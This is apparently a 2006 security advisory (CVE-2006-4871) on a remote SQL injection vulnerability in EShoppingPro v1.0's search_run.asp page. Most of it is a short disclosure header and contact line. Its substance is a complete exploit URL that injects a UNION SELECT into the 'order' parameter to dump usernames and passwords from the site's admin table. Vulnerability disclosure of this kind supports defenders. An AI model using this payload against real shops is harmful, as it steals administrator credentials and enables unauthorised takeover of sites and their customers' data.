Topic : | EShoppingPro v1.0(search_run.asp) Remote SQL Injection Vulnerability
|
SecurityAlert : 1610
CVE : CVE-2006-4871
SecurityRisk : Medium (About)
Remote Exploit : Yes
Local Exploit : No
Exploit Available : Yes
Credit : ajann
Published : 22.09.2006
Affected Software : | EShoppingPro v1.0 |
 Advisory Content : Vulnerability Report
************************************************************************
*******
# Title : EShoppingPro v1.0(search_run.asp) Remote SQL Injection
Vulnerability
# Author : ajann
# Script Page : http://www.keyvan1.com
# Exploit;
************************************************************************
*******
###http://[target]/[path]/search_run.asp?keyword=-1&category=-1&order='%
20union%20select%200,0,0,Username,Password,0,0,0,0,0,0,0,0,0,0,0,0,0%20f
rom%20admin&x=-1&y=-1
# ajann,Turkey
# ...
Feedback :
If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
|